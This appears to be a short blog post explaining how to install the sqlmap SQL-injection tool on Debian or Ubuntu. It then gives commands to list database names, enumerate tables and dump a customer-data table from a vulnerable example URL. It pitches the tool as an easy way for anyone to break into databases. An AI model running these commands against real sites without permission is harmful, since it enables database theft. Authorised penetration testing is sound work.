Showing posts with label sql. Show all posts
Showing posts with label sql. Show all posts

Wednesday, 8 October 2014

How To Install sqlmap on Debian (or Ubuntu)




sqlmap is an open-source pentesting tool that automates the exploitation of SQL injection flaws.

The tool makes it pretty easy for anyone with basic command line knowledge to exploit and break into databases.


Installation
sudo apt-get install git
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
To list available options:
python sqlmap.py -h
Fetch database names of vulnerable url:
python sqlmap.py -u www.example.com/home.php?ID=10 --dbs
Enumerate tables of a website's database (e.g.: test)
python sqlmap.py -u www.example.com/home.php?ID=10 -D test --tables
Dump all data in database (test) and table (e.g.: costumer_data)
python sqlmap.py -u www.example.com/home.php?ID=10 -D test -T costumer_data --dump
More examples are available here: https://gist.github.com/stamparm/5335217